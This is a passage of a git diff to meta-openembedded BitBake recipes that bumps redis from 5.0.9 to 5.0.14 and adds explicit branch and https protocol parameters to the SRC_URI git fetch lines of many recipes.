file://0001-os_posix-Use-__FreeBSD__-to-control-secure_getenv-de.patch \ diff --git a/meta-openembedded/meta-oe/recipes-extended/redis/redis_5.0.14.bb b/meta-openembedded/meta-oe/recipes-extended/redis/redis_5.0.14.bb new file mode 100644 index 0000000000..3d849ec8c3 --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-extended/redis/redis_5.0.14.bb @@ -0,0 +1,65 @@ +SUMMARY = "Redis key-value store" +DESCRIPTION = "Redis is an open source, advanced key-value store." +HOMEPAGE = "http://redis.io" +SECTION = "libs" +LICENSE = "BSD-3-Clause" +LIC_FILES_CHKSUM = "file://COPYING;md5=3c01b49fed4df1a79843688fa3f7b9d6" +DEPENDS = "readline lua ncurses" + +SRC_URI = "http://download.redis.io/releases/${BP}.tar.gz \ + file://redis.conf \ + file://init-redis-server \ + file://redis.service \ + file://hiredis-use-default-CC-if-it-is-set.patch \ + file://lua-update-Makefile-to-use-environment-build-setting.patch \ + file://oe-use-libc-malloc.patch \ + file://0001-src-Do-not-reset-FINAL_LIBS.patch \ + file://GNU_SOURCE.patch \ + " + +SRC_URI[sha256sum] = "3ea5024766d983249e80d4aa9457c897a9f079957d0fb1f35682df233f997f32" + +inherit autotools-brokensep update-rc.d systemd useradd + +FINAL_LIBS_x86_toolchain-clang = "-latomic" +FINAL_LIBS_mips = "-latomic" +FINAL_LIBS_arm = "-latomic" +FINAL_LIBS_powerpc = "-latomic" + +export FINAL_LIBS + +USERADD_PACKAGES = "${PN}" +USERADD_PARAM_${PN} = "--system --home-dir /var/lib/redis -g redis --shell /bin/false redis" +GROUPADD_PARAM_${PN} = "--system redis" + +REDIS_ON_SYSTEMD = "${@bb.utils.contains('DISTRO_FEATURES', 'systemd', 'true', 'false', d)}" + +do_compile_prepend() { + (cd deps && oe_runmake hiredis lua linenoise) +} + +do_install() { + export PREFIX=${D}/${prefix} + oe_runmake install + install -d ${D}/${sysconfdir}/redis + install -m 0644 ${WORKDIR}/redis.conf ${D}/${sysconfdir}/redis/redis.conf + install -d ${D}/${sysconfdir}/init.d + install -m 0755 ${WORKDIR}/init-redis-server ${D}/${sysconfdir}/init.d/redis-server + install -d ${D}/var/lib/redis/ + chown redis.redis ${D}/var/lib/redis/ + + install -d ${D}${systemd_system_unitdir} + install -m 0644 ${WORKDIR}/redis.service ${D}${systemd_system_unitdir} + sed -i 's!/usr/sbin/!${sbindir}/!g' ${D}${systemd_system_unitdir}/redis.service + + if [ "${REDIS_ON_SYSTEMD}" = true ]; then + sed -i 's!daemonize yes!# daemonize yes!' ${D}/${sysconfdir}/redis/redis.conf + fi +} + +CONFFILES_${PN} = "${sysconfdir}/redis/redis.conf" + +INITSCRIPT_NAME = "redis-server" +INITSCRIPT_PARAMS = "defaults 87" + +SYSTEMD_SERVICE_${PN} = "redis.service" diff --git a/meta-openembedded/meta-oe/recipes-extended/redis/redis_5.0.9.bb b/meta-openembedded/meta-oe/recipes-extended/redis/redis_5.0.9.bb deleted file mode 100644 index d04293369a..0000000000 --- a/meta-openembedded/meta-oe/recipes-extended/redis/redis_5.0.9.bb +++ /dev/null @@ -1,66 +0,0 @@ -SUMMARY = "Redis key-value store" -DESCRIPTION = "Redis is an open source, advanced key-value store." -HOMEPAGE = "http://redis.io" -SECTION = "libs" -LICENSE = "BSD-3-Clause" -LIC_FILES_CHKSUM = "file://COPYING;md5=3c01b49fed4df1a79843688fa3f7b9d6" -DEPENDS = "readline lua ncurses" - -SRC_URI = "http://download.redis.io/releases/${BP}.tar.gz \ - file://redis.conf \ - file://init-redis-server \ - file://redis.service \ - file://hiredis-use-default-CC-if-it-is-set.patch \ - file://lua-update-Makefile-to-use-environment-build-setting.patch \ - file://oe-use-libc-malloc.patch \ - file://0001-src-Do-not-reset-FINAL_LIBS.patch \ - file://GNU_SOURCE.patch \ - " - -SRC_URI[md5sum] = "c94523c9f4ee662027ddf90575d0e058" -SRC_URI[sha256sum] = "53d0ae164cd33536c3d4b720ae9a128ea6166ebf04ff1add3b85f1242090cb85" - -inherit autotools-brokensep update-rc.d systemd useradd - -FINAL_LIBS_x86_toolchain-clang = "-latomic" -FINAL_LIBS_mips = "-latomic" -FINAL_LIBS_arm = "-latomic" -FINAL_LIBS_powerpc = "-latomic" - -export FINAL_LIBS - -USERADD_PACKAGES = "${PN}" -USERADD_PARAM_${PN} = "--system --home-dir /var/lib/redis -g redis --shell /bin/false redis" -GROUPADD_PARAM_${PN} = "--system redis" - -REDIS_ON_SYSTEMD = "${@bb.utils.contains('DISTRO_FEATURES', 'systemd', 'true', 'false', d)}" - -do_compile_prepend() { - (cd deps && oe_runmake hiredis lua linenoise) -} - -do_install() { - export PREFIX=${D}/${prefix} - oe_runmake install - install -d ${D}/${sysconfdir}/redis - install -m 0644 ${WORKDIR}/redis.conf ${D}/${sysconfdir}/redis/redis.conf - install -d ${D}/${sysconfdir}/init.d - install -m 0755 ${WORKDIR}/init-redis-server ${D}/${sysconfdir}/init.d/redis-server - install -d ${D}/var/lib/redis/ - chown redis.redis ${D}/var/lib/redis/ - - install -d ${D}${systemd_system_unitdir} - install -m 0644 ${WORKDIR}/redis.service ${D}${systemd_system_unitdir} - sed -i 's!/usr/sbin/!${sbindir}/!g' ${D}${systemd_system_unitdir}/redis.service - - if [ "${REDIS_ON_SYSTEMD}" = true ]; then - sed -i 's!daemonize yes!# daemonize yes!' ${D}/${sysconfdir}/redis/redis.conf - fi -} - -CONFFILES_${PN} = "${sysconfdir}/redis/redis.conf" - -INITSCRIPT_NAME = "redis-server" -INITSCRIPT_PARAMS = "defaults 87" - -SYSTEMD_SERVICE_${PN} = "redis.service" diff --git a/meta-openembedded/meta-oe/recipes-extended/rrdtool/rrdtool_1.7.2.bb b/meta-openembedded/meta-oe/recipes-extended/rrdtool/rrdtool_1.7.2.bb index 5662e63474..914b12e7ca 100644 --- a/meta-openembedded/meta-oe/recipes-extended/rrdtool/rrdtool_1.7.2.bb +++ b/meta-openembedded/meta-oe/recipes-extended/rrdtool/rrdtool_1.7.2.bb @@ -10,7 +10,7 @@ SRCREV = "56a83f4f52e6745cd4352f9ee008be3183a6dedf" PV = "1.7.2" SRC_URI = "\ - git://github.com/oetiker/rrdtool-1.x.git;branch=master;protocol=http; \ + git://github.com/oetiker/rrdtool-1.x.git;branch=master;protocol=http;protocol=https \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/rsyslog/libfastjson_0.99.8.bb b/meta-openembedded/meta-oe/recipes-extended/rsyslog/libfastjson_0.99.8.bb index b84dde3d37..3b63971e5d 100644 --- a/meta-openembedded/meta-oe/recipes-extended/rsyslog/libfastjson_0.99.8.bb +++ b/meta-openembedded/meta-oe/recipes-extended/rsyslog/libfastjson_0.99.8.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=a958bb07122368f3e1d9b2efe07d231f" DEPENDS = "" -SRC_URI = "git://github.com/rsyslog/libfastjson.git;protocol=https \ +SRC_URI = "git://github.com/rsyslog/libfastjson.git;protocol=https;branch=master \ file://0001-fix-jump-misses-init-gcc-8-warning.patch" SRCREV = "4758b1caf69ada911ef79e1d80793fe489b98dff" diff --git a/meta-openembedded/meta-oe/recipes-extended/rsyslog/librelp_1.5.0.bb b/meta-openembedded/meta-oe/recipes-extended/rsyslog/librelp_1.5.0.bb index a4663148cd..9da9d7c96c 100644 --- a/meta-openembedded/meta-oe/recipes-extended/rsyslog/librelp_1.5.0.bb +++ b/meta-openembedded/meta-oe/recipes-extended/rsyslog/librelp_1.5.0.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=1fb9c10ed9fd6826757615455ca893a9" DEPENDS = "gmp nettle libidn zlib gnutls openssl" -SRC_URI = "git://github.com/rsyslog/librelp.git;protocol=https \ +SRC_URI = "git://github.com/rsyslog/librelp.git;protocol=https;branch=master \ " SRCREV = "0beb2258e12e4131dc31e261078ea53d18f787d7" diff --git a/meta-openembedded/meta-oe/recipes-extended/sanlock/sanlock_3.8.0.bb b/meta-openembedded/meta-oe/recipes-extended/sanlock/sanlock_3.8.0.bb index ffd46da0af..e720d3e5c8 100644 --- a/meta-openembedded/meta-oe/recipes-extended/sanlock/sanlock_3.8.0.bb +++ b/meta-openembedded/meta-oe/recipes-extended/sanlock/sanlock_3.8.0.bb @@ -13,7 +13,7 @@ LIC_FILES_CHKSUM = "file://../README.license;md5=60487bf0bf429d6b5aa72b6d37a0eb2 PV .= "+git${SRCPV}" -SRC_URI = "git://pagure.io/sanlock.git;protocol=http \ +SRC_URI = "git://pagure.io/sanlock.git;protocol=http;branch=master \ file://0001-sanlock-Replace-cp-a-with-cp-R-no-dereference-preser.patch;patchdir=../ \ " SRCREV = "cff348800722f7dadf030ffe7494c2df714996e3" diff --git a/meta-openembedded/meta-oe/recipes-extended/sedutil/sedutil_git.bb b/meta-openembedded/meta-oe/recipes-extended/sedutil/sedutil_git.bb index 765618433b..03446c324d 100644 --- a/meta-openembedded/meta-oe/recipes-extended/sedutil/sedutil_git.bb +++ b/meta-openembedded/meta-oe/recipes-extended/sedutil/sedutil_git.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://Common/LICENSE.txt;md5=d32239bcb673463ab874e80d47fae5 BASEPV = "1.15.1" PV = "${BASEPV}+git${SRCPV}" SRCREV = "358cc758948be788284d5faba46ccf4cc1813796" -SRC_URI = "git://github.com/Drive-Trust-Alliance/sedutil.git \ +SRC_URI = "git://github.com/Drive-Trust-Alliance/sedutil.git;branch=master;protocol=https \ file://0001-Fix-build-on-big-endian-architectures.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-extended/socketcan/can-isotp_git.bb b/meta-openembedded/meta-oe/recipes-extended/socketcan/can-isotp_git.bb index e40e1cd263..7d016bc963 100644 --- a/meta-openembedded/meta-oe/recipes-extended/socketcan/can-isotp_git.bb +++ b/meta-openembedded/meta-oe/recipes-extended/socketcan/can-isotp_git.bb @@ -3,7 +3,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=72d977d697c3c05830fdff00a7448931" SRCREV = "b31bce98d65f894aad6427bcf6f3f7822e261a59" PV = "1.0+git${SRCPV}" -SRC_URI = "git://github.com/hartkopp/can-isotp.git;protocol=https" +SRC_URI = "git://github.com/hartkopp/can-isotp.git;protocol=https;branch=master" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/socketcan/can-utils_git.bb b/meta-openembedded/meta-oe/recipes-extended/socketcan/can-utils_git.bb index 519368817f..92b38030fe 100644 --- a/meta-openembedded/meta-oe/recipes-extended/socketcan/can-utils_git.bb +++ b/meta-openembedded/meta-oe/recipes-extended/socketcan/can-utils_git.bb @@ -4,7 +4,7 @@ LIC_FILES_CHKSUM = "file://include/linux/can.h;endline=44;md5=a9e1169c6c9a114a61 DEPENDS = "libsocketcan" -SRC_URI = "git://github.com/linux-can/${BPN}.git;protocol=git" +SRC_URI = "git://github.com/linux-can/${BPN}.git;protocol=https;branch=master" SRCREV = "da65fdfe0d1986625ee00af0b56ae17ec132e700" diff --git a/meta-openembedded/meta-oe/recipes-extended/socketcan/canutils_4.0.6.bb b/meta-openembedded/meta-oe/recipes-extended/socketcan/canutils_4.0.6.bb index e1508af857..56466a6cd2 100644 --- a/meta-openembedded/meta-oe/recipes-extended/socketcan/canutils_4.0.6.bb +++ b/meta-openembedded/meta-oe/recipes-extended/socketcan/canutils_4.0.6.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" DEPENDS = "libsocketcan" SRCREV = "299dff7f5322bf0348dcdd60071958ebedf5f09d" -SRC_URI = "git://git.pengutronix.de/git/tools/canutils.git;protocol=git \ +SRC_URI = "git://git.pengutronix.de/git/tools/canutils.git;protocol=git;branch=master \ file://0001-canutils-candump-Add-error-frame-s-handling.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-extended/socketcan/libsocketcan_0.0.11.bb b/meta-openembedded/meta-oe/recipes-extended/socketcan/libsocketcan_0.0.11.bb index 0debe47e03..6a44cff93d 100644 --- a/meta-openembedded/meta-oe/recipes-extended/socketcan/libsocketcan_0.0.11.bb +++ b/meta-openembedded/meta-oe/recipes-extended/socketcan/libsocketcan_0.0.11.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://src/libsocketcan.c;beginline=3;endline=17;md5=97e38ad SRCREV = "0ff01ae7e4d271a7b81241e7a7026bfcea0add3f" -SRC_URI = "git://git.pengutronix.de/git/tools/libsocketcan.git;protocol=git" +SRC_URI = "git://git.pengutronix.de/git/tools/libsocketcan.git;protocol=git;branch=master" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/sysdig/sysdig_git.bb b/meta-openembedded/meta-oe/recipes-extended/sysdig/sysdig_git.bb index 04a022af4f..d15ecdb03f 100644 --- a/meta-openembedded/meta-oe/recipes-extended/sysdig/sysdig_git.bb +++ b/meta-openembedded/meta-oe/recipes-extended/sysdig/sysdig_git.bb @@ -18,7 +18,7 @@ JIT_riscv32 = "" DEPENDS += "lua${JIT} zlib c-ares grpc-native grpc curl ncurses jsoncpp tbb jq openssl elfutils protobuf protobuf-native jq-native" RDEPENDS_${PN} = "bash" -SRC_URI = "git://github.com/draios/sysdig.git;branch=dev \ +SRC_URI = "git://github.com/draios/sysdig.git;branch=dev;protocol=https \ file://0001-fix-build-with-LuaJIT-2.1-betas.patch \ file://0001-Fix-build-with-musl-backtrace-APIs-are-glibc-specifi.patch \ file://fix-uint64-const.patch \ diff --git a/meta-openembedded/meta-oe/recipes-extended/tipcutils/tipcutils_git.bb b/meta-openembedded/meta-oe/recipes-extended/tipcutils/tipcutils_git.bb index 637770af24..c9d9fb5729 100644 --- a/meta-openembedded/meta-oe/recipes-extended/tipcutils/tipcutils_git.bb +++ b/meta-openembedded/meta-oe/recipes-extended/tipcutils/tipcutils_git.bb @@ -2,7 +2,7 @@ SUMMARY = "Transparent Inter-Process Communication protocol" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://tipclog/tipc.h;endline=35;md5=985b6ea8735818511d276c1b466cce98" -SRC_URI = "git://git.code.sf.net/p/tipc/tipcutils \ +SRC_URI = "git://git.code.sf.net/p/tipc/tipcutils;branch=master \ file://0001-include-sys-select.h-for-FD_-definitions.patch \ file://0002-replace-non-standard-uint-with-unsigned-int.patch \ file://0001-multicast_blast-tipcc-Fix-struct-type-for-TIPC_GROUP.patch \ diff --git a/meta-openembedded/meta-oe/recipes-extended/triggerhappy/triggerhappy_git.bb b/meta-openembedded/meta-oe/recipes-extended/triggerhappy/triggerhappy_git.bb index 38ce4f5571..c62cef36d3 100644 --- a/meta-openembedded/meta-oe/recipes-extended/triggerhappy/triggerhappy_git.bb +++ b/meta-openembedded/meta-oe/recipes-extended/triggerhappy/triggerhappy_git.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" # matches debian/0.5.0-1 tag SRCREV = "44a173195986d0d853316cb02a58785ded66c12b" PV = "0.5.0+git${SRCPV}" -SRC_URI = "git://github.com/wertarbyte/${BPN}.git;branch=debian" +SRC_URI = "git://github.com/wertarbyte/${BPN}.git;branch=debian;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/upm/upm_git.bb b/meta-openembedded/meta-oe/recipes-extended/upm/upm_git.bb index 6a7611f382..7643d13e25 100644 --- a/meta-openembedded/meta-oe/recipes-extended/upm/upm_git.bb +++ b/meta-openembedded/meta-oe/recipes-extended/upm/upm_git.bb @@ -10,7 +10,7 @@ DEPENDS = "libjpeg-turbo mraa" SRCREV = "5cf20df96c6b35c19d5b871ba4e319e96b4df72d" PV = "2.0.0+git${SRCPV}" -SRC_URI = "git://github.com/eclipse/${BPN}.git;protocol=http \ +SRC_URI = "git://github.com/eclipse/${BPN}.git;protocol=http;branch=master;protocol=https \ file://0001-CMakeLists.txt-Use-SWIG_SUPPORT_FILES-to-find-the-li.patch \ file://0001-Use-stdint-types.patch \ file://0001-initialize-local-variables-before-use.patch \ diff --git a/meta-openembedded/meta-oe/recipes-extended/wipe/wipe_0.24.bb b/meta-openembedded/meta-oe/recipes-extended/wipe/wipe_0.24.bb index 831d514a4e..3ccc5afd5c 100644 --- a/meta-openembedded/meta-oe/recipes-extended/wipe/wipe_0.24.bb +++ b/meta-openembedded/meta-oe/recipes-extended/wipe/wipe_0.24.bb @@ -9,7 +9,7 @@ HOMEPAGE = "http://lambda-diode.com/software/wipe/" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://GPL;md5=0636e73ff0215e8d672dc4c32c317bb3" -SRC_URI = "git://github.com/berke/wipe.git;branch=master \ +SRC_URI = "git://github.com/berke/wipe.git;branch=master;protocol=https \ file://support-cross-compile-for-linux.patch \ file://makefile-add-ldflags.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-extended/wxwidgets/wxwidgets_git.bb b/meta-openembedded/meta-oe/recipes-extended/wxwidgets/wxwidgets_git.bb index 06337b79c7..8f766ac877 100644 --- a/meta-openembedded/meta-oe/recipes-extended/wxwidgets/wxwidgets_git.bb +++ b/meta-openembedded/meta-oe/recipes-extended/wxwidgets/wxwidgets_git.bb @@ -21,7 +21,7 @@ DEPENDS += " \ tiff \ " -SRC_URI = "git://github.com/wxWidgets/wxWidgets.git" +SRC_URI = "git://github.com/wxWidgets/wxWidgets.git;branch=master;protocol=https" PV = "3.1.3" SRCREV= "8a40d23b27ed1c80b5a2ca9f7e8461df4fbc1a31" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/zlog/zlog_1.2.14.bb b/meta-openembedded/meta-oe/recipes-extended/zlog/zlog_1.2.14.bb index b94664c33c..eddf1ed960 100644 --- a/meta-openembedded/meta-oe/recipes-extended/zlog/zlog_1.2.14.bb +++ b/meta-openembedded/meta-oe/recipes-extended/zlog/zlog_1.2.14.bb @@ -4,7 +4,7 @@ LICENSE = "LGPLv2.1" LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" SRCREV = "8fc78c3c65cb705953a2f3f9a813c3ef3c8b2270" -SRC_URI = "git://github.com/HardySimpson/zlog" +SRC_URI = "git://github.com/HardySimpson/zlog;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/zstd/zstd_1.4.5.bb b/meta-openembedded/meta-oe/recipes-extended/zstd/zstd_1.4.5.bb index cd0b471e17..f8fa226f6f 100644 --- a/meta-openembedded/meta-oe/recipes-extended/zstd/zstd_1.4.5.bb +++ b/meta-openembedded/meta-oe/recipes-extended/zstd/zstd_1.4.5.bb @@ -9,7 +9,7 @@ LICENSE = "BSD-3-Clause & GPLv2" LIC_FILES_CHKSUM = "file://LICENSE;md5=c7f0b161edbe52f5f345a3d1311d0b32 \ file://COPYING;md5=39bba7d2cf0ba1036f2a6e2be52fe3f0" -SRC_URI = "git://github.com/facebook/zstd.git;nobranch=1 \ +SRC_URI = "git://github.com/facebook/zstd.git;nobranch=1;protocol=https \ file://0001-Fix-legacy-build-after-2103.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-gnome/pyxdg/pyxdg_0.26.bb b/meta-openembedded/meta-oe/recipes-gnome/pyxdg/pyxdg_0.26.bb index a957c1d673..6fa31c58ff 100644 --- a/meta-openembedded/meta-oe/recipes-gnome/pyxdg/pyxdg_0.26.bb +++ b/meta-openembedded/meta-oe/recipes-gnome/pyxdg/pyxdg_0.26.bb @@ -5,7 +5,7 @@ LICENSE = "LGPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=f30a9716ef3762e3467a2f62bf790f0a" SRCREV = "7db14dcf4c4305c3859a2d9fcf9f5da2db328330" -SRC_URI = "git://anongit.freedesktop.org/xdg/pyxdg" +SRC_URI = "git://anongit.freedesktop.org/xdg/pyxdg;branch=master" inherit distutils3 diff --git a/meta-openembedded/meta-oe/recipes-graphics/dietsplash/dietsplash_git.bb b/meta-openembedded/meta-oe/recipes-graphics/dietsplash/dietsplash_git.bb index 32f0815921..2d13f26a3d 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/dietsplash/dietsplash_git.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/dietsplash/dietsplash_git.bb @@ -8,7 +8,7 @@ PV = "0.3" PR = "r1" SRCREV = "ef2e1a390e768e21e6a6268977580ee129a96633" -SRC_URI = "git://github.com/lucasdemarchi/dietsplash.git \ +SRC_URI = "git://github.com/lucasdemarchi/dietsplash.git;branch=master;protocol=https \ file://0001-configure.ac-Do-not-demand-linker-hash-style.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-graphics/dnfdragora/dnfdragora_git.bb b/meta-openembedded/meta-oe/recipes-graphics/dnfdragora/dnfdragora_git.bb index 007385101c..24f8e44d89 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/dnfdragora/dnfdragora_git.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/dnfdragora/dnfdragora_git.bb @@ -3,7 +3,7 @@ LICENSE = "GPLv3" LIC_FILES_CHKSUM = "file://LICENSE;md5=d32239bcb673463ab874e80d47fae504 \ " -SRC_URI = "git://github.com/manatools/dnfdragora.git \ +SRC_URI = "git://github.com/manatools/dnfdragora.git;branch=master;protocol=https \ file://0001-disable-build-manpages.patch \ file://0001-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \ file://0001-To-fix-error-when-do_package.patch \ diff --git a/meta-openembedded/meta-oe/recipes-graphics/fbgrab/fbgrab_1.3.3.bb b/meta-openembedded/meta-oe/recipes-graphics/fbgrab/fbgrab_1.3.3.bb index e3dff91915..8036d5f7a9 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/fbgrab/fbgrab_1.3.3.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/fbgrab/fbgrab_1.3.3.bb @@ -4,7 +4,7 @@ LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=ea5bed2f60d357618ca161ad539f7c0a" SECTION = "console/utils" DEPENDS = "libpng zlib" -SRC_URI = "git://github.com/GunnarMonell/fbgrab.git;protocol=https" +SRC_URI = "git://github.com/GunnarMonell/fbgrab.git;protocol=https;branch=master" SRCREV = "b179e2a42b8a5d72516b9c8d91713c9025cf6044" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-graphics/fontforge/fontforge_20190801.bb b/meta-openembedded/meta-oe/recipes-graphics/fontforge/fontforge_20190801.bb index 1863f95f0f..8f65da2c1f 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/fontforge/fontforge_20190801.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/fontforge/fontforge_20190801.bb @@ -15,7 +15,7 @@ REQUIRED_DISTRO_FEATURES_append_class-target = " x11" # tag 20190801 SRCREV = "ac635b818e38ddb8e7e2e1057330a32b4e25476e" -SRC_URI = "git://github.com/${BPN}/${BPN}.git \ +SRC_URI = "git://github.com/${BPN}/${BPN}.git;branch=master;protocol=https \ file://0001-include-sys-select-on-non-glibc-platforms.patch \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-graphics/fvwm/fvwm_2.6.9.bb b/meta-openembedded/meta-oe/recipes-graphics/fvwm/fvwm_2.6.9.bb index 3b01a216bd..d405cb8775 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/fvwm/fvwm_2.6.9.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/fvwm/fvwm_2.6.9.bb @@ -32,7 +32,7 @@ DEPENDS = " \ " SRC_URI = " \ - git://github.com/fvwmorg/fvwm.git;protocol=https \ + git://github.com/fvwmorg/fvwm.git;protocol=https;branch=master \ file://0001-Fix-compilation-for-disabled-gnome.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-graphics/glm/glm_0.9.9.6.bb b/meta-openembedded/meta-oe/recipes-graphics/glm/glm_0.9.9.6.bb index e2f4dbebc5..b44f06c555 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/glm/glm_0.9.9.6.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/glm/glm_0.9.9.6.bb @@ -9,7 +9,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://copying.txt;md5=4a735e33f271f57404fda17e80085411" SRC_URI = " \ - git://github.com/g-truc/glm;branch=master \ + git://github.com/g-truc/glm;branch=master;protocol=https \ file://0001-Fix-Wimplicit-int-float-conversion-warnings-with-cla.patch \ file://glmConfig.cmake.in \ file://glmConfigVersion.cmake.in \ diff --git a/meta-openembedded/meta-oe/recipes-graphics/graphviz/graphviz_2.40.1.bb b/meta-openembedded/meta-oe/recipes-graphics/graphviz/graphviz_2.40.1.bb index d393ae2a1c..81ab86c762 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/graphviz/graphviz_2.40.1.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/graphviz/graphviz_2.40.1.bb @@ -24,7 +24,7 @@ inherit autotools-brokensep pkgconfig gettext # https://github.com/ellson/MOTHBALLED-graphviz/releases/tag/stable_release_2.40.1 # https://gitlab.com/graphviz/graphviz/-/commit/67cd2e5121379a38e0801cc05cce5033f8a2a609 SRCREV = "67cd2e5121379a38e0801cc05cce5033f8a2a609" -SRC_URI = "git://gitlab.com/${BPN}/${BPN}.git \ +SRC_URI = "git://gitlab.com/${BPN}/${BPN}.git;branch=master \ file://0001-plugin-pango-Include-freetype-headers-explicitly.patch \ " # Use native mkdefs diff --git a/meta-openembedded/meta-oe/recipes-graphics/jasper/jasper_2.0.16.bb b/meta-openembedded/meta-oe/recipes-graphics/jasper/jasper_2.0.16.bb index 1d5a29438a..977c0961bc 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/jasper/jasper_2.0.16.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/jasper/jasper_2.0.16.bb @@ -3,7 +3,7 @@ HOMEPAGE = "https://github.com/mdadams/jasper" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=a80440d1d8f17d041c71c7271d6e06eb" -SRC_URI = "git://github.com/mdadams/jasper.git;protocol=https" +SRC_URI = "git://github.com/mdadams/jasper.git;protocol=https;branch=master" SRCREV = "9aef6d91a82a8a6aecb575cbee57f74470603cc2" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-graphics/libvncserver/libvncserver_0.9.12.bb b/meta-openembedded/meta-oe/recipes-graphics/libvncserver/libvncserver_0.9.12.bb index dfdf82458c..7f622c2793 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/libvncserver/libvncserver_0.9.12.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/libvncserver/libvncserver_0.9.12.bb @@ -44,7 +44,7 @@ FILES_libvncclient = "${libdir}/libvncclient.*" inherit cmake -SRC_URI = "git://github.com/LibVNC/libvncserver" +SRC_URI = "git://github.com/LibVNC/libvncserver;branch=master;protocol=https" SRCREV = "1354f7f1bb6962dab209eddb9d6aac1f03408110" PV .= "+git${SRCPV}" diff --git a/meta-openembedded/meta-oe/recipes-graphics/libyui/libyui-ncurses_2.52.0.bb b/meta-openembedded/meta-oe/recipes-graphics/libyui/libyui-ncurses_2.52.0.bb index 1a376a4697..8fda4b5fb0 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/libyui/libyui-ncurses_2.52.0.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/libyui/libyui-ncurses_2.52.0.bb @@ -4,7 +4,7 @@ LIC_FILES_CHKSUM = "file://COPYING.lgpl-3;md5=e6a600fd5e1d9cbde2d983680233ad02 \ file://COPYING.lgpl-2.1;md5=4fbd65380cdd255951079008b364516c \ " -SRC_URI = "git://github.com/libyui/libyui-ncurses.git \ +SRC_URI = "git://github.com/libyui/libyui-ncurses.git;branch=master;protocol=https \ file://0003-Simplify-ncurses-finding-module.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-graphics/libyui/libyui_3.6.0.bb b/meta-openembedded/meta-oe/recipes-graphics/libyui/libyui_3.6.0.bb index f3c112c3b8..72a86955e1 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/libyui/libyui_3.6.0.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/libyui/libyui_3.6.0.bb @@ -5,7 +5,7 @@ LIC_FILES_CHKSUM = "file://COPYING.gpl-3;md5=d32239bcb673463ab874e80d47fae504 \ file://COPYING.lgpl-3;md5=e6a600fd5e1d9cbde2d983680233ad02 \ " -SRC_URI = "git://github.com/libyui/libyui-old.git \ +SRC_URI = "git://github.com/libyui/libyui-old.git;branch=master;protocol=https \ file://0001-Fix-build-with-clang.patch \ file://0001-Use-relative-install-paths-for-CMake.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-graphics/openjpeg/openjpeg_2.3.1.bb b/meta-openembedded/meta-oe/recipes-graphics/openjpeg/openjpeg_2.3.1.bb index 42011efa97..2fdcec0ec2 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/openjpeg/openjpeg_2.3.1.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/openjpeg/openjpeg_2.3.1.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=c648878b4840d7babaade1303e7f108c" DEPENDS = "libpng tiff lcms zlib" SRC_URI = " \ - git://github.com/uclouvain/openjpeg.git \ + git://github.com/uclouvain/openjpeg.git;branch=master;protocol=https \ file://0002-Do-not-ask-cmake-to-export-binaries-they-don-t-make-.patch \ file://CVE-2020-6851.patch \ file://CVE-2020-8112.patch \ diff --git a/meta-openembedded/meta-oe/recipes-graphics/qrencode/qrencode_git.bb b/meta-openembedded/meta-oe/recipes-graphics/qrencode/qrencode_git.bb index 